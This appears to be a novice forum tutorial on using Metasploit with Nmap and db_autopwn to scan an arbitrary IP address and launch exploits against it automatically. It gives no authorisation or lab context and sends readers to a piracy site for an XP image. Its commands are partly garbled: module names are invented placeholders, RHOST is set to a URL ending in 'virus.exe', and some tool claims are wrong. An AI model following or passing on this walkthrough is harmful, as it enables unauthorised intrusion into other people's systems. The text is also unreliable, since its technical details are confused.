So what you need to do is:
A system older than Vista, or any *nix. If you have none, just like me, I suggest you download VMware and a WinXP VM image (thepiratebay.org). There is also the Backtrack nix system, which as I heard is VERY powerful and has such tools already built in. But Backtrack is the first nix I ever tried to use; it is totally CMD only, so I don't even know any commands and stuff, I gave it up after 10 minutes.
WinPcap. That's the main reason why you have to use anything except Vista or 7 - WinPcap ain't working on those systems.
Metasploit & Nmap. Metasploit - powerful, self-explanatory exploitation tool. Nmap - powerful port scanner.
Because I have no Backtrack or nix, I will explain stuff for WinXP.
After installing Metasploit (Nmap is included in the installer), do not launch Metasploit itself (well, you can, but then you will spend your time for great justice and the happy future of humanity), launch the update first. You will see some shit like "Configuring multi-user permissions"; this may take 4-6 minutes, but this shit happens only at the first launch.
After the update has completed, wait till the Update window closes and then open the Metasploit console itself. Wait a little bit again, and when the window has booted up, type in:
Code:
db_create
Then we need to connect to this db, type:
Code:
db_connect
Code:
Set - set something
Show - show something
Use - use something (exploit or payload)
Search - search exploits by name and description
Exploit\Run - run the exploit
Check - check the exploit
First, we need to set the payload:
Set Payload http/appache_chunk (not exact, just an example)
and then we need to set the exploit itself
use http/appache_chunk/blahdoh
and run the exploit
Exploit\Run (but sometimes it also requires connecting)
Well, for example we have a working exploit, but what does it do? How does it work, and so on?
After we set the exploit and payload, we will type:
Code:
show info
Code:
show options
Code:
set RHOST http://sethioz.com/virus.exe
set RPORT 80
That was the main part, now the easiest. Metasploit 3.4 has db_autopwn.
First, run CMD. Type in
Code:
ping IP
If packets are received, then go on.
In Metasploit, type db_create, db_connect again.
Now the part where Nmap comes in use:
Code:
nmap -sT -sV IP
Next, type:
Code:
db_autopwn -p -t -e
UPD: Damn, Nmap sucks a lot. It gives you WRONG info. Use Blue's Port Scanner to find out the open ports on the IP and Acunetix Web Scanner to detect the OS. Then use the Search thing.